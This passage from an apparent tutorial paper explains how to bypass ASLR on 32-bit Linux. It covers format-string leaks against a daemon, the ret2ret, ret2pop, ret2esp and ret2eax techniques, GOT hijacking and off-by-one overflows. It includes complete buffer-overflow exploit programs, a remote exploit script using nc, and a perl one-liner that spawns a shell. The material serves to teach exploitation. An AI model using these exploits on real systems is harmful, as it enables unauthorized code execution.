So the address of writebuf is bfe14858 hex. But the address of the stack's bottom is still needed to calculate the offset. It can be detected by:
> cat /proc/`pidof divulge`/stat \
> | awk '{ print $28 }'
3219214128$
So the base address of the stack is 3219214128 dec = bfe14f30 hex. Now the offset can be calculated: bfe14f30 hex - bfe14858 hex = 6d8 hex = 1752 dec.
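The same arithmetic, written as two small C helpers. This is only a sketch with made-up function names: stack_offset is the measurement taken once with gdb, and locate_buffer applies that offset to the stack bottom of a later, differently randomized run.

```c
/* Offset between the stack's bottom and a buffer, measured once. */
unsigned long stack_offset(unsigned long stack_bottom, unsigned long buf_addr)
{
    return stack_bottom - buf_addr;
}

/* Address of the buffer in another run, given that run's stack bottom. */
unsigned long locate_buffer(unsigned long stack_bottom, unsigned long offset)
{
    return stack_bottom - offset;
}
```

With the values from the gdb session, stack_offset(3219214128, 0xbfe14858) is 1752, and subtracting 1752 from any freshly read stack bottom gives the address of writebuf for that run.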
You can find an exploit using this constant offset in figure 15. The exploit expects the address of the stack's bottom as a parameter. If you start the exploit as shown below, the shellcode is executed on the server side:
> ./divexploit `cat /proc/$(pidof divulge)/stat \
> | awk '{ print $28 }'` \
> | nc localhost 7776

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
/* shellcode[] is assumed to be defined elsewhere; it is not part of this figure */
int main(int argc, char **argv) {
    char *buff, *ptr;
    long *adr_ptr;
    int i;
    /* address of writebuf = stack bottom - constant offset */
    unsigned long stackpointer = strtoul(argv[1], NULL, 10) - 1752;
    buff = malloc(265);
    ptr = buff;
    adr_ptr = (long *)ptr;
    for (i = 0; i < 264; i += 4)      /* assumes a 4-byte long (32-bit x86) */
        *(adr_ptr++) = stackpointer;
    ptr = buff;
    for (i = 0; i < strlen(shellcode); i++)
        *(ptr++) = shellcode[i];
    buff[264] = '\0';
    printf("%s", buff);
}
Figure 15: divexploit.c
  798. 7.2 Formatted information
As shown in section 3, format string vulnerabilities can cause a denial of service. Section 11 will show that format string vulnerabilities can even be used to execute shellcode. But under ASLR it also makes sense to bring such a vulnerability into a state in which it divulges information about the address space. An attacker could pass a format string, e.g. "%x%x%x", that makes the printf command divulge this information. You will see that this information - in conjunction with buffer overflows - can be used to run shellcode as well.
Consider the network daemon divulge again. It does not only contain a strcpy vulnerability, but also a sprintf vulnerability. In the last subsection you have seen how to exploit divulge locally. With the format string vulnerability it is even possible to exploit divulge remotely. The idea is to connect to divulge twice: first to receive critical information about the stack addresses by exploiting the format string vulnerability, and second to send an injection vector.
If you are familiar with format strings, you know that the string %m$x prints the m-th parameter above the format string - even if this location has not been designed to be a parameter. So an attacker can read out the whole stack above the format string.
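The m$ notation can be tried out harmlessly with arguments that really exist. The sketch below assumes a C library that supports the POSIX numbered-argument conversions (glibc does; ISO C alone does not require them), and the function name swapped is made up for illustration.

```c
#include <stdio.h>

/* Formats two strings in swapped order by selecting the arguments
 * by position: %2$s is the second argument, %1$s the first. */
int swapped(char *out, size_t n, const char *first, const char *second)
{
    return snprintf(out, n, "%2$s %1$s", first, second);
}
```

A format string such as %20$x uses the same mechanism, but names a position for which no argument was ever passed, so the formatting function reads whatever happens to be stored at that position.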
Usually there are pointers on the stack that point to other stack locations, e.g. a saved frame pointer. Such a pointer itself is not constant due to ASLR, but the difference between the pointer and the beginning of the stack is. So it is possible to recalculate the bottom of the stack after the difference has been calculated once. Therefore it is not necessary to read the /proc/<pid>/stat file again and again, and remote exploitation becomes possible.
The first useful pointer in the divulge daemon can be found at the 20th position above the format string. This can be determined using gdb or simply by trial and error.
  837. > echo "%20\$x" | \
  838. > nc localhost 7776
  839. > bfb16640
  840. A comparison with the beginning of the stack
  841. provides the constant difference to this pointer:
  842. bfb16c90 hex − bfb16640 hex = 650 hex = 1616 dec .
The exploit in figure 15 expects the address of the stack's bottom as a parameter and can be reused here. So an attack works as follows: first it connects to divulge to receive the pointer, afterwards it computes the beginning of the stack, and finally it connects again to send the malicious string, which is computed in exactly the same way as before. So an automated attack looks as follows:
PHEX=$(echo "%20\$x" \
  | nc localhost 7776 \
  | awk '{print toupper($2)}')
PDEC=$(echo -e \
  "ibase=16;$PHEX" | bc)
STACK=$(($PDEC + 1616))
./divexploit $STACK \
  | nc localhost 7776
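The conversion step of this script (hexadecimal text to number, plus the constant difference) can be sketched in C as well. The function name stack_bottom_from_leak and the macro LEAK_TO_BOTTOM are hypothetical; the value 1616 is the difference measured above and is specific to this build of divulge.

```c
#include <stdlib.h>

#define LEAK_TO_BOTTOM 1616UL   /* difference measured for divulge */

/* leak_hex: the hexadecimal text returned for "%20$x", e.g. "bfb16640".
 * Returns 0 if the text does not start with a hexadecimal number. */
unsigned long stack_bottom_from_leak(const char *leak_hex)
{
    char *end;
    unsigned long ptr = strtoul(leak_hex, &end, 16);

    if (end == leak_hex)
        return 0;
    return ptr + LEAK_TO_BOTTOM;
}
```

For the leaked value bfb16640 this yields bfb16c90 hex, the stack bottom used in the comparison above.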
  859. 8 Stack juggling methods
This section presents the creative ideas of Izik Kotler for bypassing ASLR. He calls them "stack juggling methods". These juggling methods rely on "a certain stack layout, a certain program flow or certain register changes. Due to the nature of these factors, they might not fit to every situation." (cf. [Kot05b])
  866. 8.1 ret2ret
The problem with ASLR is that it is useless to overwrite the return address with a fixed address. The idea of ret2ret is to return to an already existing pointer that points into the shellcode. Such existing pointers must contain valid stack addresses to work; these valid stack addresses are potential pointers to the shellcode. The attacker does not know anything about the stack addresses, but that does not matter, because he overwrites the instruction pointer with the content of such a potential shellcode pointer.
  877. Figure 16: ret2ret illustration
That sounds easy in theory. But there is a big practical problem: how can such a pointer be used as a return address? Until now the only way to manipulate the program flow was to overwrite the return instruction pointer directly. But it is not possible to copy something, e.g. the potential shellcode pointer, to this location. Therefore another way is used to get the potential shellcode pointer into the EIP register: return to return to return to ... to the pointer (see figure 16).
That means it is possible to move hand over hand straight to the shellcode pointer using several ret commands. To understand the chain of returns, recall what a return does: a return means pop eip, i.e. the content of the location the ESP points to is written to the EIP. Usually this content is the RIP when ret is executed. Furthermore the ESP moves one location upwards (the stack shrinks). Imagine the RIP location contains a pointer to a ret command itself, and the location above as well, and so on. This ends in a chain of returns: ret2ret.
Remember that the addresses of the code segment are not randomized. A ret command can be found in the code segment of every program. So it is no problem to fill the stack with reliable pointers to return commands. The return chain should end right before the potential shellcode pointer, which is then used by the last ret. So the number of returns is variable; it depends on the offset from the return instruction pointer to the potential shellcode pointer.
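The chain of returns can be followed in a toy model. The sketch below does not execute any machine code; it only mimics the pop eip step on an array of 32-bit words, and the function name follow_ret_chain is made up for illustration. Index 0 stands for the overwritten RIP location, higher indexes for older stack contents.

```c
#include <stddef.h>
#include <stdint.h>

/* Each simulated ret pops one word into eip. If that word is the
 * address of another ret, the chain continues; otherwise control
 * leaves the chain and eip holds the final jump target. */
uint32_t follow_ret_chain(const uint32_t *stack, size_t words,
                          uint32_t ret_addr, size_t *rets_executed)
{
    size_t esp = 0;
    uint32_t eip = 0;

    *rets_executed = 0;
    while (esp < words) {
        eip = stack[esp++];       /* ret: pop eip, the stack shrinks */
        (*rets_executed)++;
        if (eip != ret_addr)
            break;                /* reached the potential shellcode pointer */
    }
    return eip;
}
```

For a stack consisting of three copies of the ret address followed by one stack pointer, four returns are executed and the last one loads the stack pointer into eip.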
The potential shellcode pointer must be placed above (that means before) the first RIP, i.e. the pointer has to be older than the vulnerable buffer. But where can pointers to newer stack frames be found? Every string, and therefore most buffer overflows, has to be terminated by a zero byte. Thus the least significant byte of the potential shellcode pointer can be overwritten with a zero. Due to this zero byte the pointer may become smaller than before, and from then on it points to newer stack contents - where the shellcode is placed (see figure 16). This byte alignment only works on a little endian system with a downwards growing stack. Who wants to try this on Sun SPARC? ;-) (cf. [Kot05a]).
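The effect of the terminating zero byte on a little endian pointer can be shown without touching a real stack. This is a sketch with a made-up function name; it lays the pointer out byte by byte, lowest address first, and clears the first byte, which is where the string terminator of the overflow would land.

```c
#include <stdint.h>

/* Returns the value a 32-bit little endian pointer has after its
 * first (lowest-address) byte was overwritten with zero. */
uint32_t after_terminator(uint32_t pointer)
{
    unsigned char bytes[4];

    bytes[0] = (unsigned char)(pointer & 0xff);           /* LSB comes first */
    bytes[1] = (unsigned char)((pointer >> 8) & 0xff);
    bytes[2] = (unsigned char)((pointer >> 16) & 0xff);
    bytes[3] = (unsigned char)((pointer >> 24) & 0xff);

    bytes[0] = 0;                                          /* string terminator */

    return (uint32_t)bytes[0] | ((uint32_t)bytes[1] << 8) |
           ((uint32_t)bytes[2] << 16) | ((uint32_t)bytes[3] << 24);
}
```

The pointer moves towards lower addresses by at most 255 bytes, which is why the target area has to be padded generously for the modified pointer to land inside it.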
#include <string.h>
void function(char *str) {
    char buffer[256];
    strcpy(buffer, str);
}
int main(int argc, char **argv) {
    int no = 1;
    int *ptr = &no;    /* potential shellcode pointer */
    function(argv[1]);
}
Figure 17: ret2ret.c
As an example, consider figure 17. This C program comes with a strcpy vulnerability and the potential pointer ptr. What is needed for an exploit is the address of a return command. It can be determined by using gdb as follows:
(gdb) disass main
0x080483d4 <main+0>: lea ...
...
0x0804840f <main+59>: ret
So a possible address of a ret command is 0804840f hex. Another possible address can be found with disass function. Everything else, like how many ret commands have to be placed before the pointer, can be determined with gdb as well. I do not think I have to discuss all these issues in detail. But I want to point out that such an exploit should contain as many NOP instructions (0x90) as possible, to increase the chance that the potential pointer hits the shellcode.
You can find an (often) working exploit for ret2ret in figure 18. Just pass the output of the exploit to the input of ret2ret:
> ./ret2ret `./ret2retExploit`
sh-3.1$
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
/* shellcode[] is assumed to be defined elsewhere; it is not part of this figure */
int main(void) {
    char *buff, *ptr;
    long *adrptr; int i;
    buff = malloc(281);                  /* 280 payload bytes + terminating zero */
    ptr = buff;
    adrptr = (long *)ptr;
    for (i = 0; i < 280; i += 4)         /* fill with the address of ret */
        *(adrptr++) = 0x0804840f;
    for (i = 0; i < 260; i++)            /* NOPs over the buffer part */
        buff[i] = 0x90;
    ptr = buff + (260 - strlen(shellcode));
    for (i = 0; i < strlen(shellcode); i++)
        *(ptr++) = shellcode[i];
    buff[280] = '\0';
    printf("%s", buff);
}
Figure 18: ret2retExploit.c
I said it works "often", because the address space is randomized at every instantiation, so there always remains a risk that the shellcode pointer does not lead to its goal (after the byte alignment).
  976. 8.2 ret2pop
The idea of a ret chain has been explained in the ret2ret section. The ret2pop method picks up this idea. During the ret2ret attack the goal was to align a pointer with the shellcode by overwriting its least significant byte. In contrast, the ret2pop method has been developed to take advantage of an already perfect pointer. The question is how to modify the return chain in such a way that the least significant byte of a perfect pointer is not overwritten. The answer is: return to return to ... to pop to return to the pointer (see figure 19).
Before I discuss how this method works in detail, I want to note how to find such a perfect pointer. The trick is to survey the multiple locations where the shellcode is stored. After an exploitation attempt the shellcode is placed twice on the stack: first in the overflowed buffer and second still in the argv array. It is often possible to find perfect pointers into the argv array, e.g. when the main input is passed on to a function. Classic attacks usually try to return into the overflowed buffer. Since one can find perfect pointers to the argv array, it is worth a try to return into this area.
Now assume there is such a perfect pointer to the argv area. A ret2ret chain to this pointer would destroy its perfectness, since the terminating zero byte overwrites the least significant byte. So the input must stop four bytes earlier, so that the zero byte overwrites the least significant byte of the location before the pointer. The problem is that the location before the pointer is then filled with nonsense, and it becomes necessary to jump over this location. It is possible to skip one location with a pop command (see figure 19). But it is necessary to use a pop ret combination and not an arbitrary single pop command, because the shellcode pointer should be used as an instruction pointer afterwards.
Figure 19: ret2pop illustration
There are a lot of possible pop commands in assembler. In practice you will frequently find pop ebp commands followed by a ret command. But the EBP register is not of particular interest; what matters is just the pop command. The pop command causes the stack to shrink and therefore skips four bytes - here the four bytes before the perfect pointer. So the idea is to return to such a pop ebp command, skip four bytes, and let the ret command be executed afterwards because of the usual incrementation of the EIP register. The execution of this last ret command leads to the shellcode, since the ESP register now points to the perfect argv pointer.
#include <string.h>
int function(int x, char *str) {
    char buf[256];
    strcpy(buf, str);
    return x;
}
int main(int argc, char **argv) {
    function(64, argv[1]);
}
Figure 20: ret2pop.c
  1037. Consider the C program ret2pop for instance (see
  1038. figure 20). The code contains a strcpy vulnerabil-
  1039. ity in function and a perfect pointer to argv. This
  1040. pointer exists, because an argv argument is directly
  1041. passed to function. The debugger displays where
  1042. exactly you can find this pointer:
  1043. (gdb) print str
  1044. $1 = 0xbf873a85 "AAAA"
  1045. (gdb) x/4x $ebp
  1046. bf8720e8 080483c0 00000040 bf873a85
According to the debugger the argv pointer to bf873a85 hex is placed very near to the return instruction pointer (which currently contains 080483c0 hex). There is no room for a long return chain; the address of the pop ret sequence has to be placed directly into the RIP location. So there is no need for a single ret command. Now it becomes clear why I have built in the first parameter x of function. Without this dummy (64 dec = 40 hex) there would not even be enough room to place one single pop ret address without overwriting the argv pointer with a zero byte.
What is needed next for a successful exploit is the address of a pop ret combination. The easiest way to find such an instruction sequence is to use the following command:
  1062. > objdump -D ret2pop | grep -B 2 ret
  1063. 8048466: 5b pop %ebx
  1064. 8048467: 5d pop %ebp
  1065. 8048468: c3 ret
  1066. Hence the address of a pop ret sequence is
  1067. 08048467 hex . This address would be the last entry of a
  1068. ret2pop chain. The entries before, the single ret com-
  1069. mands, would contain 08048468 hex for instance. But
  1070. these entries are not needed here as I have mentioned
  1071. above.
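Instead of grepping a disassembly, the opcode bytes themselves can be searched for. The following sketch scans a memory image for a byte pattern; the function name find_bytes is made up, and the pattern 5d c3 for pop %ebp followed by ret is taken from the objdump listing above. Reading the binary into memory and translating the file offset of a hit into a virtual address are left out and would depend on the layout of the binary.

```c
#include <stddef.h>
#include <string.h>

/* Returns the offset of the first occurrence of pattern in image,
 * or (size_t)-1 if the pattern does not occur. */
size_t find_bytes(const unsigned char *image, size_t image_len,
                  const unsigned char *pattern, size_t pattern_len)
{
    size_t i;

    if (pattern_len == 0 || pattern_len > image_len)
        return (size_t)-1;
    for (i = 0; i + pattern_len <= image_len; i++)
        if (memcmp(image + i, pattern, pattern_len) == 0)
            return i;
    return (size_t)-1;
}
```

A byte-wise search like this finds a sequence at any offset, independent of how a dump tool groups or orders the bytes it prints.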
You can find a working exploit in figure 21. Unlike the ret2ret exploit there is no remaining risk that it fails, because the shellcode pointer has been perfect from the very beginning - it is not manipulated. Again you can call the exploit as follows:
> ./ret2pop `./ret2popExploit`
sh-3.1$

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#define POPRET 0x08048467
#define RET 0x08048468
#define bufsize 264
#define chainsize 4
/* shellcode[] is assumed to be defined elsewhere; it is not part of this figure */
int main(void) {
    char *buff, *ptr;
    long *adrptr;
    int i;
    buff = malloc(bufsize + 1);          /* +1 for the terminating zero */
    for (i = 0; i < bufsize; i++)
        buff[i] = 'A';
    ptr = buff + bufsize - chainsize;
    adrptr = (long *)ptr;
    for (i = bufsize - chainsize; i < bufsize; i += 4)
        if (i == bufsize - 4) *(adrptr++) = POPRET;   /* last entry: pop; ret */
        else *(adrptr++) = RET;                       /* earlier entries: ret */
    ptr = buff;
    for (i = 0; i < strlen(shellcode); i++)
        *(ptr++) = shellcode[i];
    buff[bufsize] = '\0';
    printf("%s", buff);
}
Figure 21: ret2popExploit.c

8.3 ret2esp
The principle of this method is to interpret hardcoded data as instructions. ret2esp takes advantage of the instruction sequence jmp *esp. But you cannot find jmp *esp in a normal binary - this sequence is just not produced by gcc. Before I explain how to find this instruction anyhow, I want to show how to utilize it.
Consider the illustration in figure 22. The position of the ESP is predictable during the function epilogue. Therefore it is smart to place the shellcode at the position the ESP will point to during the epilogue. Additionally overwriting the instruction pointer with a pointer to jmp *esp leads to the execution of the shellcode. The jmp command continues the program flow at the address the ESP points to.
The position of the ESP after the RIP has been loaded is always one location above the RIP. So the shellcode has to be placed above the RIP this time.
This technique sounds nice, but - as I mentioned before - it is impossible to find a jmp *esp instruction sequence in the assembler dump of binaries. Well, one can search the hexadecimal dump of a binary for ffe4 hex. This hexadecimal number will be interpreted as jmp *esp. If an attacker can find this number hardcoded anywhere in the binary, he can determine the corresponding address and overwrite the RIP accordingly.
This seems to be rarely applicable in practice. But the chance of finding ffe4 hex hardcoded in a binary increases with the size of the binary. Let's take a look at the tar binary. /bin/tar has a size of 226K. A simple hexdump followed by grep ffe4 results in five hits - and hits that are separated by spaces or line feeds are not even listed.
  1143. Figure 22: ret2esp illustration
  1144. > hexdump tar | grep ffe4
  1145. ffe0 0807 5807 0000 ffe4 0807
  1146. 25ff ffe4 0807 c068 0002 e900
  1147. 9be8 ffe4 31ff c6c0 e105 081c
  1148. 8900 240c 57e8 ffe4 85ff 0fc0
  1149. dbe8 ffe4 80ff e7bd fffd 00ff
And considering the whole /usr/bin/ directory results in over 7000 hits on my machine:
> hexdump /usr/bin/* \
> | grep ffe4 | wc -l
7031
#include <string.h>
void function(char *str) {
    char buf[256];
    strcpy(buf, str);
}
int main(int argc, char **argv) {
    int j = 58623;    /* e4ff hex, stored as the bytes ff e4 */
    function(argv[1]);
}
Figure 23: ret2esp.c
Consider the vulnerable program ret2esp in figure 23. The code contains the hardcoded decimal number 58623. Note that 58623 dec is e4ff hex, which a little endian machine stores as the byte sequence ff e4. One can determine the address of 58623, and therefore the address of jmp *esp, as follows:
(gdb) disass main
0x080483e5: movl $0xe4ff,...
(gdb) x/i 0x080483e8
0x080483e8: jmp *%esp
Thus the correct address is 080483e8 hex. The offset of three bytes is needed to skip the bytes of the original mov instruction that precede the constant. A working exploit can be found in figure 24. It can be applied as usual by typing ./ret2esp `./ret2espExploit`.
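Why the decimal constant 58623 ends up as the bytes ff e4 can be checked with a few lines of C. This is a sketch; the function name store_le32 is made up, and it writes the bytes in little endian order explicitly, so that the result is the same on any host.

```c
#include <stdint.h>

/* Writes value into out[0..3] in little endian order, i.e. in the
 * order in which an x86 stores a 32-bit constant in memory. */
void store_le32(uint32_t value, unsigned char out[4])
{
    out[0] = (unsigned char)(value & 0xff);
    out[1] = (unsigned char)((value >> 8) & 0xff);
    out[2] = (unsigned char)((value >> 16) & 0xff);
    out[3] = (unsigned char)((value >> 24) & 0xff);
}
```

For 58623 (e4ff hex) the first two bytes are ff and e4, which is exactly the byte sequence that gdb decodes as jmp *%esp.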
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
/* shellcode[] is assumed to be defined elsewhere; it is not part of this figure */
int main(void) {
    char *buff, *ptr;
    long *adr_ptr;
    int i;
    /* room for 264 filler bytes, the shellcode, the terminating zero
       and the last 4-byte store of the fill loop */
    buff = malloc(264 + strlen(shellcode) + 4);
    ptr = buff;
    adr_ptr = (long *)ptr;
    for (i = 0; i < 264 + strlen(shellcode); i += 4)
        *(adr_ptr++) = 0x080483e8;       /* address of jmp *%esp */
    ptr = buff + 264;                    /* shellcode goes above the RIP */
    for (i = 0; i < strlen(shellcode); i++)
        *(ptr++) = shellcode[i];
    buff[264 + strlen(shellcode)] = '\0';
    printf("%s", buff);
}
Figure 24: ret2espExploit.c
  1198. 8.4 ret2eax
  1199. The idea of this approach is to use the information that
  1200. is stored in the accumulator, the EAX register. A func-
  1201. tion that returns a value, stores this value by using EAX.
  1202. Thus a function that returns a string, writes a pointer to
  1203. this string into the accumulator right before the execu-
  1204. tion is continued by the calling function. The calling
  1205. function can use the content of EAX afterwards, e.g. by
  1206. assigning it to a variable.
  1207. The builtin function strcpy is such a function that
  1208. stores a string pointer in the EAX register. Some peo-
  1209. ple don’t know this feature of strcpy, because it is
  1210. hardly used. Usually it is sufficient to copy a string
  1211. into another buffer. But typing the following will work
  1212. as well:
  1213. bufptr = strcpy(buf,str);
As a result, bufptr points to the same location as buf. After strcpy returns, the accumulator always holds a pointer to the buffer - even if this pointer is not assigned to a variable. The same holds for user defined functions and a lot of other builtin functions. So the EAX register can be a perfect pointer to the shellcode.
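That strcpy hands back its destination can be verified at the C level. The sketch below uses a made-up function name and adds a length check so that the example itself does not overflow; which register carries the return value is a matter of the calling convention and is not visible in C.

```c
#include <string.h>

/* Returns 1 if strcpy returned the destination pointer,
 * -1 if src would not fit into the local buffer. */
int strcpy_returns_dest(const char *src)
{
    char buf[256];
    char *bufptr;

    if (strlen(src) >= sizeof buf)
        return -1;                /* refuse input that would overflow */
    bufptr = strcpy(buf, src);
    return bufptr == buf;
}
```

The C standard specifies that strcpy returns the value of its first argument, so the comparison always holds for input that fits.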
#include <string.h>
void function(char *str) {
    char buf[256];
    strcpy(buf, str);    /* last statement: EAX still points to buf on return */
}
int main(int argc, char **argv) {
    function(argv[1]);
}
Figure 25: ret2eax.c
Consider the code of the C program ret2eax listed in figure 25. This code contains the obligatory strcpy vulnerability, but not much more. It is exploitable under ASLR by overwriting the RIP with a pointer to the instruction call *%eax (see figure 26).
  1236. Figure 26: ret2eax illustration
Note that this exploitation technique only works if the accumulator remains unaltered until the call *%eax instruction is executed. This code would not be exploitable if further commands followed the strcpy call and altered the accumulator. And it should be clear that nearly every command alters the accumulator. So this code is exploitable only because the strcpy call is the very last command of function.
As the exploit is based on the command call *%eax, it is necessary to determine the address of such an instruction sequence. This sequence can usually not be found within one's own code. But one will always find this sequence somewhere in the foreign code by using objdump as follows:
> objdump -D ret2eax | grep -B 2 "call"
804848f: je 80484a3
8048491: xor %ebx,%ebx
8048493: call *%eax
Thus the address looked for is 08048493 hex. You can find an exploit using this address in figure 27. It is applicable as usual by ./ret2eax `./ret2eaxExploit`.
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
/* shellcode[] is assumed to be defined elsewhere; it is not part of this figure */
int main(void) {
    char *buff, *ptr;
    long *adr_ptr;
    int i;
    buff = malloc(265);                  /* 264 payload bytes + terminating zero */
    ptr = buff;
    adr_ptr = (long *)ptr;
    for (i = 0; i < 264; i += 4)
        *(adr_ptr++) = 0x08048493;       /* address of call *%eax */
    ptr = buff;
    for (i = 0; i < strlen(shellcode); i++)
        *(ptr++) = shellcode[i];
    buff[264] = '\0';
    printf("%s", buff);
}
Figure 27: ret2eaxExploit.c
  1278. 9 GOT hijacking
A common return into libc attack as described in [c0n06a] does not work anymore, since ASLR randomizes the address space of the stack as well as the address space of the libraries. But the library functions which are called within a program have to be resolved anyway. Therefore the library functions have an entry in two tables: the GOT and the PLT. A way of bypassing ASLR is to attack these tables. But first I want to explain what exactly these tables are. The ideas of this section are based on [c0n06b].
  1289. 9.1 GOT and PLT
GOT stands for Global Offset Table and PLT for Procedure Linkage Table. These tables are closely related to each other as well as to the dynamic linker and libc. They gain in importance as soon as a library function is called. Consider the libc function printf and figure 28 for instance.
Figure 28: GOT and PLT
With this illustration I want to explain what happens if a program calls a library function. The principle is so-called lazy binding: external symbols are not resolved until they are really needed. According to [San06]:
  1301. 1. A library function is called (e.g. printf). Jump
  1302. to its relevant entry of the PLT. This entry points
  1303. to an entry in the GOT.
  1304. 2. Jump to the address that this entry of the GOT
  1305. contains.
  1306. a) If the function is called for the first time this
  1307. address points to the next instruction in the
  1308. PLT, which calls the dynamic linker to re-
  1309. solve the function’s address. How the dy-
  1310. namic linker works in detail will not be dis-
  1311. cussed here. If the function’s address has
  1312. been found somehow it is written to the GOT
  1313. and the function is executed.
  1314. b) Otherwise the GOT already contains the ad-
  1315. dress that points to printf. The function is
  1316. executed immediately. The part of the PLT
  1317. that calls the dynamic linker is no longer
  1318. used.
  1319. 3. The execution of the function has been finished.
  1320. Go on with the execution of the calling function.
  1321. The PLT contains instructions (namely jmp instruc-
  1322. tions) and the GOT contains pointers. So an attack
  1323. should focus on overwriting the entries of the GOT.
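The lazy binding steps above can be imitated with an ordinary function pointer. The following is a toy model only, with made-up names; a real PLT and GOT are generated by the linker and filled in by the dynamic linker, but the control flow (jump through a table entry, resolve on first use, patch the entry) is the same in spirit.

```c
typedef int (*func_t)(int);

static int resolver_calls = 0;                       /* how often the "linker" ran */
static int real_function(int x) { return x + 1; }    /* stands in for printf */
static int resolve_stub(int x);

/* One GOT entry: initially it points back at the resolver stub. */
static func_t got_entry = resolve_stub;

/* Plays the role of the PLT remainder plus the dynamic linker. */
static int resolve_stub(int x)
{
    resolver_calls++;
    got_entry = real_function;    /* write the resolved address to the GOT */
    return got_entry(x);          /* then execute the function */
}

/* Plays the role of the first PLT instruction: jmp *GOT[n]. */
int call_via_plt(int x)
{
    return got_entry(x);
}

int resolver_call_count(void)
{
    return resolver_calls;
}
```

After two calls through call_via_plt the resolver has run exactly once; the second call goes straight to the function because the table entry has been patched. The model also shows why the GOT is the interesting target: it is a writable pointer that decides where every later call ends up.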
  1324. 9.2 ret2got
Common exploitation techniques for buffer overflows overwrite the RIP to manipulate the instruction pointer and consequently the program flow. Manipulating the GOT is a completely different approach: the GOT entry of a function A is patched so that it points to another function B. Every time function A is called, function B is executed with the parameters function A has been called with. That can be utilised to run commands, if function B is e.g. system and the parameter of A can be set by user input, to /bin/sh for instance. According to [c0n06b] this technique does not only bypass ASLR but also a non-executable stack.
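The redirection of function A to function B can again be imitated with a table of function pointers. This is a harmless toy model with made-up names: nothing is exploited, the table entry is simply overwritten by the program itself, and function_b only records that it was called instead of running a command.

```c
#include <stdio.h>

typedef int (*got_slot_t)(const char *);

static char last_call[64];                 /* records who ran, and with what */

static int function_a(const char *arg)     /* stands in for printf */
{
    snprintf(last_call, sizeof last_call, "A(%s)", arg);
    return 0;
}

static int function_b(const char *arg)     /* stands in for system */
{
    snprintf(last_call, sizeof last_call, "B(%s)", arg);
    return 0;
}

enum { SLOT_A, SLOT_B, SLOT_COUNT };
static got_slot_t got[SLOT_COUNT] = { function_a, function_b };

/* The effect of the attacker's write: slot A now holds B's address. */
void patch_slot_a(void)
{
    got[SLOT_A] = got[SLOT_B];
}

/* Every call to "A" is an indirect call through its slot. */
const char *call_a(const char *arg)
{
    got[SLOT_A](arg);
    return last_call;
}
```

Before the patch call_a("x") reports A(x); after patch_slot_a() the same call site reports B with the unchanged argument, which is the behaviour the ret2got attack relies on.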
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
void anyfunction(void) {
    system("someCommand");
}
int main(int argc, char **argv) {
    char *ptr;
    char array[8];
    ptr = array;
    strcpy(ptr, argv[1]);
    printf("Array has %s at %p\n", ptr, &ptr);
    strcpy(ptr, argv[2]);
    printf("Array has %s at %p\n", ptr, &ptr);
}
Figure 29: ret2got.c
More precisely, the GOT entry of a function has to be redirected to the dynamic linker call of another function. Consider the C program ret2got listed in figure 29. The GOT entry of printf will be redirected to the dynamic linker call that corresponds to the system function. For convenience, let us assume that system is used somewhere in the code. anyfunction is not really needed, as you see - it just exists to provide a reference to system. Admittedly, this example is very artificial for the sake of simplicity, and finding such a vulnerability in the wild is more difficult.
An exploit for ret2got works as follows: The first strcpy is used to overflow the buffer array and thereby to overwrite ptr with the address of printf's GOT entry. This makes it possible to overwrite the GOT entry of printf during the second strcpy, since ptr now points to this GOT entry.
The first printf call is only of informational interest; it also triggers the dynamic linker to resolve printf's address. The second printf call will be interpreted as:
system("Array has %s at %p\n");
So printf has become a synonym for system, and the arguments remain unchanged. What happens now is that system tries to execute the shell command Array. I have already explained this behavior in section 5. An attacker could, for instance, create a script called Array that contains /bin/sh.
The principle of the exploit is now clear, but the details are still missing, mainly: How can the address of printf's GOT entry be determined, and how can the address of system's dynamic linker call be determined? Both can be solved by using gdb. First the GOT entry:
(gdb) disass main
<main+70>: call 0x804834c
(gdb) disass 0x804834c
<printf@plt+0>: jmp *0x80496ac
<printf@plt+6>: push $0x10
<printf@plt+11>: jmp 0x804831c
So the relevant entry for printf can be found at address 0x080496ac within the GOT. If one can manipulate the content of 0x080496ac, one can manipulate the program flow. The jmp instruction is an indirect jump (it is marked with an asterisk); this agrees with the theoretical explanation I gave about the relationship between the GOT and the PLT.
Determining the address of system's dynamic linker call is easy as well:
(gdb) disass anyfunction
0x08048431: call 0x804832c
(gdb) disass 0x804832c
0x0804832c: jmp *0x80496a4
0x08048332: push $0x0
0x08048337: jmp 0x0804831c
(gdb) x/x 0x80496a4
0x080496a4: 0x08048332
So the address where the dynamic linker call of system happens is 0x08048332. This address has to be written into the GOT entry of printf, which can be found at address 0x080496ac. In other words, 0x08048332 has to be written to the location 0x080496ac. Redirecting printf's GOT entry in this way causes the execution of system whenever printf is called.
Again you can see the correctness of the theoretical explanation, since system's GOT entry contains 0x08048332, which is exactly the next instruction within system's PLT entry. (Note: Alternatively one can overwrite printf's GOT entry with 0x0804832c; it would be redirected to 0x08048332 anyway.)
Finally, I can show a working exploit. Fortunately, the exploit itself is much simpler than the path that led to it:
> ./ret2got `perl -e 'print "A"x8; \
> print "\xac\x96\x04\x08"'` \
> `perl -e 'print "\x32\x83\x04\x08"'`
Array has ... at 0xbfe01f2c
sh-3.1$ echo oh my got
oh my got
Furthermore, it is possible to overwrite GOT entries through format string vulnerabilities. More about such vulnerabilities and how to exploit them can be found in section 11.
Figure 30: off-by-one illustration
10 Off by one
Off-by-one describes a way to exploit a vulnerability where a buffer can be overflowed by only one byte. This is usually the least significant byte of the saved frame pointer (SFP), since the SFP is placed on the stack directly next to the local variables. Furthermore, this least significant byte is usually overwritten with zero, because this is the terminating byte of the user's input.
Frame pointer overwrites were already described in [klo99] eight years ago. The principle still works under ASLR, since the frame pointer is changed relative to its real position and not absolutely. Nevertheless, ASLR makes it more difficult to exploit such a vulnerability, because after the frame pointer trick an attacker finds himself in a common buffer overflow situation, where he has to define the EIP. Defining the EIP requires one of the ASLR stack smashing methods (e.g. a return into non-randomized areas, brute forcing, one of the stack juggling methods, et cetera).
An off-by-one is based on a typical programming mistake where the programmer has miscalculated a buffer size by just one byte. Such a vulnerable code fragment could look like the following:
for (i=1; i<=size; i++)
    dst[i] = src[i];
And this is just one of the most primitive off-by-one vulnerabilities. Other off-by-ones can occur due to the fact that strlen returns the length without the terminating zero byte, while other functions like strncpy expect a length that includes the zero byte. This is confusing and often leads a programmer to write strlen(str)+1, which is again not the best choice in every context.
